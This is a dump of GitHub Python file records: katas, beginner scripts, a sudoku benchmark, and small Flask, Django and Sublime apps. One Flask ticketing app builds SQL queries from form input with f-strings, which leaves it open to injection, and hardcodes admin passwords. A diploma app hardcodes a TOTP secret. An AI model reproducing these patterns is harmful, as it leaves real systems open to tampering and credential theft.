while(current >1):\n        while (True):\n            #while ( i >= 0 and i < size and j>= 0 and j<size):\n            newi = i + di\n            newj = j + dj\n            if newi >= 0 and newi < size and newj>= 0 and newj < size and numbers[newi][newj] is None:\n                i = newi\n                j = newj\n                current -= 1\n            else:\n                break\n\n        di,dj = turn(di, dj)\n    print_array(numbers)\n\ndef turn(di, dj):\n    if di==0 and dj==-1:\n        dj = 0\n        di = 1\n    elif di == 1 and dj == 0:\n        di = 0\n        dj = 1\n    elif di == 0 and dj == 1:\n        di = -1\n        dj = 0\n    else:\n        di = 0\n        dj = -1\n    return di, dj\ninline(size)\nvertical(size)\nprint()\nspiral(size)\n","repo_name":"epfl-dojo/kata-squareNumbers","sub_path":"squareNumbers.py","file_name":"squareNumbers.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} {"seq_id":"21733045191","text":"x = 1\nprint(x + 3)\n\ndef say_hello_to(name):\n\tprint(\"Hello \" + name)\n\nsay_hello_to(\"David\")\n\nif x < 2:\n\tprint(\"Si, \" + str(x) + \" es menor que 2\")\nelif x == 2:\n\tprint(\"x es igual a 2\")\nelse:\n\tprint(\"La comparacion no es cierta\")\n\n\"\"\"\nedad = input(\"Introduce tu edad: \")\nprint(int(edad))\n\nedadInt = int(edad)\nif edadInt < 18:\n\tprint(\"Eres menor de edad\")\nelif edadInt == 18:\n\tprint(\"Tienes 18 anyos\")\nelse:\n\tprint(\"Eres mayor de edad\")\n\"\"\"\nprovincia = \"Girona\"\nif(provincia == \"Barcelona\"):\n\tprint(\"Oferta Barcelona\")\nelif(provincia == \"Girona\"):\n\tprint(\"Oferta Girona\")\nelif(provincia == \"Lleida\" or provincia == \"Tarragona\"):\n\tprint(\"Oferta Tarraco LLeida\")\nelse:\n\tprint(\"Oferta resto mundial\")\n\nestado = 110\nwhile estado <= 10:\n\tprint(\"Numero: \" + str(estado))\n\testado = estado + 1\n\nmi_tupla = ('David', 21, 'Barcelona', True)\n\nmi_lista = ['Jose', 21, 'Girona', True]\n\nfor i, valor in enumerate(mi_lista):\n\tif not isinstance(valor, bool) and isinstance(valor, int):\n\t\tmi_lista[i] = int(valor) + 1\n\nprint(mi_lista)\n\nfoods = {}\n\nfoods[\"banana\"] = \"A delicious and tasty treat!\"\nfoods[\"dirt\"] = \"Not delicious. Not tasty. 
DO NOT EAT!\"\n\nfoods[\"banana\"]\n","repo_name":"cometilla/Python","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72974837432","text":"from __future__ import print_function\n\nimport Solver\nimport sys\nimport os\nimport os.path as op\nimport re\nimport statsmodels.api as sm\n\nimport matplotlib as mpl\nmpl.use(\"Agg\") # This lets you plot (and save) if you run remotely.\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom numpy import *\nimport collections\nimport json\n\n#thispath = op.abspath(op.dirname(__file__))\nthispath = op.abspath(os.getcwd())\nimpath = op.join(thispath, \"images\")\n\n\nmpl.rcParams['lines.linewidth'] = 3\nmpl.rcParams[\"figure.figsize\"] = 7, 5\nmpl.rcParams[\"figure.titlesize\"]=\"xx-large\"\nmpl.rcParams[\"figure.titleweight\"]=\"bold\"\nmpl.rcParams['axes.titlesize']=\"x-large\" # fontsize of the axes title \nmpl.rcParams['axes.labelsize']=\"large\"\nmpl.rcParams[\"xtick.major.size\"]=6\nmpl.rcParams[\"xtick.labelsize\"]=\"large\"\nmpl.rcParams[\"ytick.labelsize\"]=\"large\"\nmpl.rcParams[\"ytick.major.size\"]=6\nmpl.rcParams[\"grid.alpha\"] = 0.5\nmpl.rcParams[\"axes.grid\"] = True\nmpl.rcParams[\"savefig.dpi\"] = 1000\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\n\nhristics = [\"Fixed Selector\", \"Most Constrained Variable\"]\n\ndef valid(sequence): # checks if sequence is valid or not\n if len(sequence) != 81:\n \treturn False\n validity = [str(i) for i in range(10)]\n for i in sequence:\n \tif i not in validity:\n \t\treturn False\n return True\n\nproblemSet = []\nproblemComments = []\ndatafile = op.join(thispath, \"TESTCASES.txt\")\n\ndef getFile(f=datafile):\n\n with open(f, 'r') as f:\n \tlines = [line.strip() for line in f]\n\n problem = \"\"\n for i, line in enumerate(lines):\n \tif i % 11 == 0:\n \t\tproblemComments.append(line)\n \telif i % 11 == 10:\n \t\tif not valid(problem):\n \t\t\traise ValueError(\"Invalid board sequence.\")\n \t\tproblemSet.append(problem)\n \t\tproblem = \"\"\n \telse:\n \t\tproblem += ''.join(line.split())\n\n return problemSet, problemComments\n\ndef getDifficulty(prob, comm):\n\n diffdict = {'easy': [[],[]], 'medium': [[],[]], 'hard': [[],[]], 'evil': [[],[]]}\n sudoku = Solver.Solver(1, 2)\n cnt = 0\n for problem, comment in zip(prob,comm):\n \n fstr = re.search('[a-zA-Z][a-zA-Z]', comment)\n fstr = fstr.group(0).lower()\n\n initFill = sudoku.start(problem)\n for k in diffdict.keys():\n \t if k.startswith(fstr):\n diffdict[k][0].append(cnt)\n diffdict[k][1].append(initFill)\n continue\n cnt += 1\n\n return diffdict\n\n\ndef runall(ht, su, prob=[], comm=[], f=datafile):\n\n \n if not prob:\n prob, comm = getFile(f)\n\n nBacktracks = []\n nRuleNakedK = []\n\n times = []\n\n sudoku = Solver.Solver(ht, su)\n for problem, comment in zip(prob, comm):\n# print(\"--------------------------------------------------\")\n# print(\"--------------------------------------------------\")\n# print(\"Running: \" + comment)\n\n fstr = re.search('[a-zA-Z][a-zA-Z]', comment)\n\n sudoku.start(problem)\n # print(\"\\nStarting board:\")\n# # sudoku.printBoard()\n#\n# print(\"solving....\")\n success, nBackTrack, nStrategy, time = sudoku.solve()\n\n if not success:\n print(\"Whoa! Problem \" + fstr + \" FAILED: \")\n inp = int(input(\"What should we do. Press 1 to abort, 0 to continue: \"))\n if inp:\n print(\"Abobo! 
\")\n sys.exit(-1)\n\n #IsSucc.append(int(success))\n\n # print(\"\\nFinal board:\")\n # sudoku.printFullBoard()\n\n# print(\"Time: \\t\\t\\t\\t \", time)\n# print(\"Num backtrackings: \\t\\t \", nBackTrack)\n# for i, n in enumerate(nStrategy):\n# print(\"Num Strategy Level: \\t\", i+1, n)\n\n \n nRuleNakedK.append(tuple(nStrategy))\n times.append(time)\n nBacktracks.append(nBackTrack)\n\n return array(nBacktracks), array(nRuleNakedK).T, array(times)\n\n\nif __name__ == \"__main__\":\n\n prob, comm = getFile()\n\n #Returns dict\n difficulty = getDifficulty(prob, comm)\n dfill = {k: mean(i[1]) for k, i in difficulty.items()}\n diffidx = {k: array(i[0]) for k, i in difficulty.items()}\n\n print(\"Average filled-in num:\")\n [print(k, i) for k, i in dfill.items()] \n diffic = ['easy', 'medium', 'hard', 'evil']\n\n lsys = len(sys.argv)\n\n if lsys < 2:\n heuristic = (0, 1)\n strat = tuple(range(4))\n hstrat = [(h,s) for h in heuristic for s in strat]\n else:\n if lsys > 4 or lsys == 2:\n print(\"Give both heuristic and strategy level and no more. \")\n sys.exit(-1)\n heuristic = bool(int(sys.argv[2])-1)\n hstrat = [tuple(heuristic, int(sys.argv[3]))]\n\n fullMean = {}\n fullStd = {}\n abc = []\n coll = {}\n\n for hs in hstrat:\n heuristic, strategy = hs\n hkey = hristics[heuristic]\n if hkey not in fullMean.keys():\n fullMean[hkey] = []\n fullStd[hkey] = []\n\n nBack, nNaked, timing = runall(heuristic, strategy, prob, comm) \n metrics = [\"time\", \"backtrack\", \"strategy\"]\n dc = collections.defaultdict(dict)\n dcsum = collections.defaultdict(dict)\n dcstd = collections.defaultdict(dict)\n for k, d in diffidx.items():\n dc[k]['time'] = timing[d]\n dc[k]['backtrack'] = nBack[d]\n dc[k]['strategy'] = nNaked[:, d]\n\n for k, d in dc.items():\n print(\"----------------\")\n print(\"Problem Type: \" + k)\n for k1, d1 in d.items():\n results = mean(d1.T, axis=0)\n rstd = std(d1.T, axis=0)\n abc.append((results, rstd))\n print(\"Average \" + k1 + \": \" + str(results))\n dcsum[k][k1] = results\n dcstd[k][k1] = rstd\n\n\n print(\"----------------\")\n fullMean[hkey].append(dcsum)\n fullStd[hkey].append(dcstd)\n if strategy == 3:\n coll[hkey] = dc\n \n\n for k, d in fullMean.items():\n print(\"----------------\")\n print(\"----------------\")\n print(\"Run Type: \", k)\n for ii, dsubs in enumerate(d):\n print(\"Inference Rules: \", ii)\n for k1, d1 in dsubs.items():\n print(\"Difficulty: \", k1)\n for k2, d2 in d1.items():\n print(\"Metric \" + k2 + \" | Result : \" + str(d2))\n\n print(\"----------------\")\n\n#%% Plots \n plott = 1\n\n if plott:\n ftime, atime = plt.subplots(1,2, sharey=True)\n fback, aback = plt.subplots(1,2, sharey=True)\n ftime.suptitle(\"Runtime Performance\")\n fback.suptitle(\"Backtracks\")\n\n axi = 0\n drange = list(range(4))\n wid = 0.2\n ttot = []\n btot = []\n for k, d in fullMean.items():\n rct = []\n rcb = []\n for ii, dsubs in enumerate(d):\n ti = []\n bi = []\n ts = []\n bs = []\n label = []\n dr = [d + (ii-2)*wid for d in drange]\n #drn = [[xstrt[xi] + d + ii*wid/2 for d in drange] for xi in range(len(dsubs))]\n for k1, do in dsubs.items():\n ti.append(do['time'])\n bi.append(do['backtrack'])\n ts.append(fullStd[k][ii][k1]['time']/4)\n bs.append(fullStd[k][ii][k1]['backtrack']/10)\n label.append(k1)\n \n ttot.extend(ti)\n btot.extend(bi)\n print(ti)\n rt = atime[axi].bar(dr, ti, wid, yerr=ts)\n rct.append(rt)\n rb = aback[axi].bar(dr, bi, wid, yerr=bs)\n rcb.append(rb)\n \n \n atime[axi].set_title(k)\n aback[axi].set_title(k)\n atime[axi].set_xticks(drange)\n 
aback[axi].set_xticks(drange)\n atime[axi].set_xticklabels(label)\n aback[axi].set_xticklabels(label)\n if not axi:\n atime[axi].set_ylabel('Average runtime (s)')\n aback[axi].set_ylabel('Average backtracks per puzzle')\n legtime = atime[axi].legend([r[0] for r in rct], (drange))\n legback = aback[axi].legend([r[0] for r in rcb], (drange))\n legtime.set_title('Inference Level')\n legback.set_title('Inference Level')\n \n atime[axi].set_xlabel('Difficulty')\n aback[axi].set_xlabel('Difficulty')\n axi+=1\n\n ftime.savefig(\"TimePerform.pdf\")\n fback.savefig(\"BackPerform.pdf\")\n\n fc = plt.figure(\"Correlate\")\n plt.scatter(btot, ttot)\n bX = sm.add_constant(btot)\n mdl = sm.OLS(ttot, bX)\n mdf = mdl.fit()\n pm = mdf.params\n ba = linspace(0, max(btot))\n plt.plot(ba, pm[1] * ba + pm[0], 'k')\n plt.xlabel(\"Average Runtime (s)\")\n plt.xlabel(\"Average backtracks per puzzle\")\n \n plt.show()\n","repo_name":"ASK1995/Artificial-Intelligence","sub_path":"Project 3/allDan.py","file_name":"allDan.py","file_ext":"py","file_size_in_byte":8884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"15276041822","text":"# coding=utf-8\nfrom flask import Flask\nimport tensorflow_softmax_restore as tfsr\n\napp = Flask(__name__)\nPORT=8200\n\n@app.route('/')\ndef index2():\n file = 'test0.txt'\n return tfsr.getresult(file)\n\nif __name__ == '__main__':\n app.run(debug=True, port=PORT)\n ","repo_name":"yuchengle/tensorflow_softmax01","sub_path":"tensorflow_softmax_flask.py","file_name":"tensorflow_softmax_flask.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11620210828","text":"class Vault:\r\n def __init__(self, sickles, galleons, knuts) -> None:\r\n self.sickles= sickles\r\n self.galleons= galleons\r\n self.knuts= knuts\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.galleons} Galleons, {self.sickles} Sickels, {self.knuts} Knuts\"\r\n \r\n def __add__(self, other):\r\n galleons= self.galleons + other.galleons\r\n sickels= self.sickles + other.sickles \r\n knuts= self.knuts + other.knuts\r\n return Vault(galleons, sickels, knuts)\r\n \r\n \r\npotter= Vault(100,50, 25)\r\nprint(potter)\r\n\r\nwesley= Vault(25,50, 100)\r\nprint(wesley)\r\n\r\ntotal = potter+ wesley\r\nprint(total)","repo_name":"arriynn/CS50P_Python_Programming","sub_path":"Lecture's/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38015798106","text":"from django.urls import include, path\n\nimport django_devicectl.views as views\n\n# from django.views.generic import TemplateView\n\n\nurlpatterns = [\n path(\n \"api/\",\n include(\n (\"django_devicectl.rest.urls.devicectl\", \"devicectl_api\"),\n namespace=\"devicectl_api\",\n ),\n ),\n path(\n \"//\",\n views.view_instance_load_facility,\n name=\"devicectl-home\",\n ),\n path(\"/\", views.view_instance, name=\"devicectl-home\"),\n]\n","repo_name":"fullctl/devicectl","sub_path":"src/django_devicectl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"31687236780","text":"from flask import Flask,render_template,request,redirect,url_for\r\nimport sqlite3\r\nimport datetime\r\napp = 
Flask(__name__,template_folder=\"templets\",static_folder=\"static\")\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n return render_template(\"status.html\")\r\n\r\n@app.route(\"/form/\")\r\ndef form():\r\n return render_template(\"form.html\")\r\n@app.route(\"/probid\",methods = ['POST'])\r\ndef probid():\r\n now = datetime.datetime.now()\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n fname = request.form.get('01')\r\n lname = request.form.get('02')\r\n email = request.form.get('03')\r\n phone = request.form.get('04')\r\n prob = request.form.get('05')\r\n print(fname,lname,email,phone,prob)\r\n f = cur.execute(\"SELECT * FROM Data\")\r\n id = len(f.fetchall())+1\r\n pid = int(str(now.day)+str(now.month)+str(now.year)+str(now.hour)+str(now.minute)+str(now.second))\r\n dat = str(now.date())\r\n tim = str(now.time())\r\n cur.execute(f\"INSERT INTO Data VALUES({id},{pid},'{fname}','{lname}','{email}',{phone},'{prob}',1,'{dat}','{tim}')\")\r\n con.commit()\r\n con.close()\r\n return render_template(\"probid.html\",proid = pid)\r\n\r\n@app.route(\"/getstatus\",methods=['POST'])\r\ndef gstatus():\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n pid = request.form.get('01')\r\n f = cur.execute(f\"SELECT status FROM Data WHERE ProbId == {int(pid)}\")\r\n stat = f.fetchall()[0][0]\r\n return render_template(\"stat.html\",sdata = stat)\r\n\r\n@app.route(\"/admP\",methods = ['POST'])\r\ndef adminp():\r\n user = request.form.get(\"user\")\r\n passwd = request.form.get(\"passwd\")\r\n credentials = {\"admin\":\"TechoSolvz@113322\",\"Rahul1122\":\"Rahul@9676\"}\r\n if user in credentials.keys() and credentials[user] == passwd:\r\n return render_template(\"AdminPage.html\")\r\n else:\r\n return '
Enter Correct credentials',False\r\n@app.route(\"/admin\")\r\ndef admin():\r\n    return render_template (\"admin.html\")\r\n\r\n@app.route(\"/up\",methods = ['POST'])\r\ndef adminup():\r\n    data1 = request.form.get(\"01\")\r\n    data2 = request.form.get(\"02\")\r\n    if data1 == None and data2 == 'updb':\r\n        return render_template(\"update.html\")\r\n    else:\r\n        return \"Error\"\r\n\r\n\r\n@app.route(\"/data\",methods=['POST'])\r\ndef data():\r\n    data1 = request.form.get(\"01\")\r\n    data2 = request.form.get(\"02\")\r\n    if data1 == 'data' and data2 == None:\r\n        con = sqlite3.connect(\"data.db\")\r\n        cur = con.cursor()\r\n        data = cur.execute(\"SELECT * FROM Data\")\r\n        data = data.fetchall()\r\n        con.close()\r\n        return render_template(\"data.html\",data=data)\r\n    else:\r\n        return \"Error\"\r\n\r\n@app.route(\"/adminupdate\",methods = ['POST'])\r\ndef adminupdate():\r\n    con = sqlite3.connect(\"data.db\")\r\n    cur = con.cursor()\r\n    pidd = request.form.get(\"pid\")\r\n    col = request.form.get(\"col\")\r\n    val = request.form.get(\"val\")\r\n    cur.execute(f\"UPDATE Data SET {col}='{val}' WHERE Id={pidd}\")\r\n    con.commit()\r\n    return 'Data Updated
'\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n app.run(debug=True)","repo_name":"Rahulsree1/TechosolvZ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21228231773","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n# Create your models here.\n\n\nclass Users(AbstractUser):\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n )\n","repo_name":"alf1983/todobv","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73762531832","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beater', '0008_album_sha1sum'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='album',\n name='sha1sum',\n ),\n migrations.AddField(\n model_name='song',\n name='sha1sum',\n field=models.CharField(max_length=40, null=True),\n ),\n ]\n","repo_name":"tpalko/freshbeats-pi","sub_path":"webapp/beater/migrations/0009_auto_20160514_0431.py","file_name":"0009_auto_20160514_0431.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33585120685","text":"import sublime\nimport sublime_plugin\nfrom subprocess import run, PIPE\nfrom threading import Thread\nimport time\nfrom datetime import datetime\nimport os\nimport sys\n\n\ndef execute_with_stdin(cmd, shell, cwd, text):\n before = time.perf_counter()\n # https://docs.python.org/3/library/subprocess.html#subprocess.run - new in version 3.5\n # therefore, this python file should be in your User package (which defaults to Python 3.8)\n # and you need to be using ST build >= 4050\n p = run(cmd, shell=shell, cwd=cwd, capture_output=True, input=text, encoding='utf-8')\n after = time.perf_counter()\n return (p, after - before)\n\n\ndef get_execution_action(cmd, shell_cmd):\n \"\"\" Determine what command to execute and whether or not the result should\n replace the selection or insert after it.\n \"\"\"\n\n # Check to see if the command says to execute in place or not\n do_replace = True\n if shell_cmd and shell_cmd[0] == '!':\n shell_cmd = shell_cmd[1:]\n do_replace = False\n elif cmd and cmd[0][0] == '!':\n cmd[0] = cmd[0][1:]\n do_replace = False\n\n # this shell_cmd/cmd logic was borrowed from Packages/Default/exec.py\n if shell_cmd:\n cmd_text = shell_cmd\n if sys.platform == \"win32\":\n # Use shell=True on Windows, so shell_cmd is passed through\n # with the correct escaping\n cmd = shell_cmd\n shell = True\n else:\n cmd = [\"/usr/bin/env\", \"bash\", \"-c\", shell_cmd]\n shell = False\n else:\n cmd_text = ' '.join(cmd)\n shell = False\n\n return shell, cmd, cmd_text, do_replace\n\n\ndef set_execution_annotations(view, regions, cmd_text):\n view.add_regions('pipe_cmd', regions,\n scope='comment', icon='circle',\n annotations=[cmd_text] * len(regions),\n flags=sublime.DRAW_NO_FILL)\n\n\nclass PipeTextCommand(sublime_plugin.TextCommand):\n \"\"\"Pipe text from ST - the selections, if any, otherwise the entire buffer contents\n - to the specified shell command.\n Useful for formatting XML or JSON in a quick and easy manner.\n 
i.e. a workaround for https://github.com/sublimehq/sublime_text/issues/3294\n This command requires Python >= 3.5, and therefore, ST build >= 4050, and for the\n package to have opted in to the Python 3.8 plugin host. (The User package is\n automatically opted-in.)\n \"\"\"\n def run(self, edit, cmd=None, shell_cmd=None, working_dir=None):\n if not shell_cmd and not cmd:\n raise ValueError(\"shell_cmd or cmd is required\")\n\n if shell_cmd and not isinstance(shell_cmd, str):\n raise ValueError(\"shell_cmd must be a string\")\n\n shell, cmd, cmd_text, do_replace = get_execution_action(cmd, shell_cmd)\n\n # if not all selections are non-empty\n if not all(self.view.sel()) and do_replace:\n # use the entire buffer instead of the selections\n regions = [sublime.Region(0, self.view.size())]\n else:\n # use the user's selections\n regions = self.view.sel()\n\n if not working_dir and self.view.file_name():\n working_dir = os.path.dirname(self.view.file_name())\n\n self.was_read_only = self.view.is_read_only()\n self.view.set_read_only(True)\n\n self.view.set_status('pipe_cmd', '[Executing pipe_cmd]')\n set_execution_annotations(self.view, regions, cmd_text)\n\n thread = Thread(\n target=self.execute,\n args=(cmd, shell, working_dir, cmd_text, regions, do_replace))\n thread.start()\n\n\n def finish(self):\n self.view.set_read_only(self.was_read_only)\n self.view.erase_status('pipe_cmd')\n\n def execute(self, cmd, shell, working_dir, cmd_text, regions, do_replace):\n failures = False\n start = time.perf_counter()\n logs = list()\n def log(message):\n nonlocal logs\n log_text = str(datetime.now()) + ' ' + message\n logs.append(log_text)\n print(log_text)\n\n for region in reversed(regions):\n text = self.view.substr(region)\n\n p, time_elapsed = execute_with_stdin(cmd, shell, working_dir, text)\n\n # TODO: also report the selection index?\n log(f'command \"{cmd!r}\" executed with return code {p.returncode} in {time_elapsed * 1000:.3f}ms')\n\n if p.returncode == 0:\n self.view.run_command('pipe_text_action', {\n 'region': [region.a, region.b],\n 'data': p.stdout,\n 'do_replace': do_replace,\n 'cmd_text': cmd_text\n })\n else:\n failures = True\n log(p.stderr.rstrip())\n\n total_elapsed = time.perf_counter() - start\n if failures:\n sublime.error_message('\\n'.join(logs)) # TODO: don't include the datetimes here?\n else:\n sublime.status_message(f'text piped and replaced successfully in {total_elapsed * 1000:.3f}ms')\n\n sublime.set_timeout(self.finish, 0)\n\n\nclass PipeTextActionCommand(sublime_plugin.TextCommand):\n def run(self, edit, cmd_text, region, data, do_replace):\n region = sublime.Region(region[0], region[1])\n\n regions = self.view.get_regions('pipe_cmd')\n regions.remove(region)\n set_execution_annotations(self.view, regions, cmd_text)\n\n was_read_only = self.view.is_read_only()\n self.view.set_read_only(False)\n\n if do_replace:\n self.view.replace(edit, region, data)\n else:\n self.view.insert(edit, region.b, data)\n\n self.view.set_read_only(was_read_only)\n\n\n# example for pretty printing XML using xmllint:\n# TODO: option for no xml prolog when working with selections? 
https://stackoverflow.com/q/37118327/4473405\n#view.run_command('pipe_text', { 'cmd': ['xmllint', '--format', '-'] })\n\n# example for pretty printing JSON using jq:\n#view.run_command('pipe_text', { 'cmd': ['jq', '.'] })\n\n#view.run_command('pipe_text', {\"shell_cmd\": \"sort | uniq\"})","repo_name":"STealthy-and-haSTy/PipeText","sub_path":"pipe_text.py","file_name":"pipe_text.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5245645066","text":"import math\r\n\r\nBULLET_MAX_DISTANCE = 500\r\n\r\n\r\nclass Bullet:\r\n def __init__(self, x, y, r, speed, angle):\r\n self.x = x\r\n self.y = y\r\n self.r = r\r\n self.speed = speed\r\n self.angle = angle\r\n \r\n self.distance = 0\r\n \r\n def is_gone(self):\r\n return self.distance > BULLET_MAX_DISTANCE\r\n \r\n def move_bullet(self):\r\n self.x += self.speed*math.cos(self.angle)\r\n self.y += self.speed*math.sin(self.angle)\r\n \r\n self.distance += 10\r\n \r\n","repo_name":"soladobola/dqn-rl-asteroids","sub_path":"Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3458306974","text":"from .. import base\nimport yaml\nfrom typing import List, final\nimport pickle\nimport pfc_util as pfc\n\n\n@final\nclass CalcConfig(\n base.SpecifiesRotationAngle,\n base.SpecifiesPFCParams,\n base.SpecifiesShape,\n base.SpecifiesPrecision,\n base.ConfigBase\n ):\n\n def __init__(self, config: dict):\n super().__init__(config)\n\n with open(f'{self.file_path(\"pfc\")}/log.pkl', 'rb') as f:\n self.log: List[pfc.toolkit.MuSearchRecord] = pickle.load(f)\n\n self.mu_ = self.log[-1].mu[-1]\n\n self.lx_min = self.to_float(config['lx_min'])\n self.lx_max = self.to_float(config['lx_max'])\n\n self.eps_ = self.to_float(self.eps)\n self.alpha_ = self.to_float(self.alpha)\n self.beta_ = self.to_float(self.beta)\n\n self.solid_file = f'{self.file_path(\"pfc\")}/unit_sol.field'\n self.liquid_file = f'{self.file_path(\"pfc\")}/unit_liq.field'\n \n\ndef parse_config(path: str):\n with open(path, 'r') as f:\n config = yaml.safe_load(f)\n return CalcConfig(config)\n\n\n\n","repo_name":"michael-960/pfc_interface","sub_path":"utils/calc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22630953696","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom PIL import Image \n\nimport pyotp\nimport os\n\nimport timestamp as tmstp\nimport ajout_texte as aj_txt\nimport stegano as st\nimport sign_verify as sv\nimport testmail as tm\n\n\napp = Flask(__name__)\n\ntmstp.initializeBdd()\n\nauth = False\n\n\n@app.route('/')\ndef root():\n if auth:\n return render_template('index.html')\n else:\n return render_template('authentication.html')\n\n@app.route('/authentication', methods=['POST'])\ndef authentication():\n nom = request.form['nom']\n mdp = request.form['mdp']\n global auth\n if nom == 'admin' and mdp == '1234': \n auth = True\n else:\n auth = False\n return redirect('/')\n\n\n@app.route('/formulaire')\ndef formulaire():\n if auth:\n return render_template('formulaire.html', creation=\"\")\n else:\n return redirect('/')\n\n\n\n\ndef creerPass():\n secret = 'KillyanPovoaMaximeDubus'\n totp = pyotp.TOTP(secret)\n return totp\n\n\n@app.route('/creation_diplome', methods=['POST'])\ndef 
creation_diplome():\n if auth:\n nom = request.form['nom']\n prenom = request.form['prenom']\n intitule = request.form['intitule']\n mail = request.form['mail']\n otp = request.form['otp']\n img = Image.open('image_test.png')\n\n totp = creerPass()\n\n if totp.verify(otp):\n timestamp = tmstp.getTimestamp(img, nom, prenom, intitule)\n aj_txt.ajoutTxt(nom, prenom, intitule, timestamp, img)\n qrcode = sv.create_qrcode(nom, prenom, intitule)\n img.paste(qrcode, (1430, 950))\n img.save('img2.png')\n tm.envoi_mail(mail)\n os.system(\"rm -Rf img2.png\")\n return redirect(url_for('conf_creation', ind=0))\n\n else:\n return redirect(url_for('conf_creation', ind=1))\n \n else:\n return redirect('/')\n\n@app.route('/conf_creation/')\ndef conf_creation(ind):\n if ind == 0:\n rapport = \"Diplôme créé et envoyé avec succès.\"\n else:\n rapport = \"Erreur lors de la création du diplôme. L'OTP fourni est inexact.\"\n return render_template('conf_creation.html', rapport=rapport)\n\n\n@app.route('/verif_page')\ndef verifPage():\n if auth:\n return render_template('verifPage.html')\n else:\n return redirect('/')\n\n\n\n@app.route('/verif_diplome', methods=['POST'])\ndef verifDiplome():\n if auth:\n img1 = request.files['img']\n img = Image.open(img1)\n nom = request.form['nom']\n prenom = request.form['prenom']\n intitule = request.form['intitule']\n txt = str(nom) + str(prenom) + str(intitule)\n while (len(txt)<64):\n txt = txt + \"0\"\n longueur = 64 + 7331\n msg = st.recuperer(img, longueur)\n bloc1 = msg[:64]\n bloc2 = msg[64:]\n \n verif_tmstp = tmstp.verifTimestamp(bloc2)\n img.crop((1430, 950, 1600, 1120)).save('extracted_qrcode.png')\n\n verif_qrcode=sv.verif_qrcode(nom, prenom, intitule)\n \n bool1 = bloc1 == txt \n bool2 = verif_tmstp == \"Verification: OK\\n\"\n bool3 = verif_qrcode == \"Verified OK\\n\"\n\n\n if bool1 and bool2 and bool3 :\n ind = 1\n elif not bool1 and not bool2 and not bool3:\n ind = 2\n elif not bool1 and not bool2:\n ind = 3\n elif not bool1 and not bool3:\n ind = 4\n elif not bool3 and not bool2:\n ind = 5\n elif not bool1:\n ind = 6\n elif not bool2:\n ind = 7\n elif not bool3:\n ind = 8\n return redirect(url_for('rapport', ind=ind))\n\n else:\n return redirect('/')\n\n\n@app.route('/rapport/')\ndef rapport(ind):\n\n error1 = \"-Le texte caché ne correspond pas avec les informations que vous avez rentrées.\"\n error2 = \"-La vérification du timestamp a échoué.\"\n error3 = \"-La vérification de la signature a échoué.\"\n lst_errors = []\n\n if auth:\n if ind == 1:\n rapport = \"Diplôme valide\"\n elif ind == 2:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error2)\n lst_errors.append(error3)\n elif ind == 3:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error2)\n elif ind == 4:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error3)\n elif ind == 5:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error2)\n lst_errors.append(error3)\n elif ind == 6:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n elif ind == 7:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error2)\n elif ind == 8:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error3)\n return render_template('rapport.html', rapport = rapport, lst_errors=lst_errors, ind=ind)\n\n else:\n return redirect('/')\n\n\n\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=8080, 
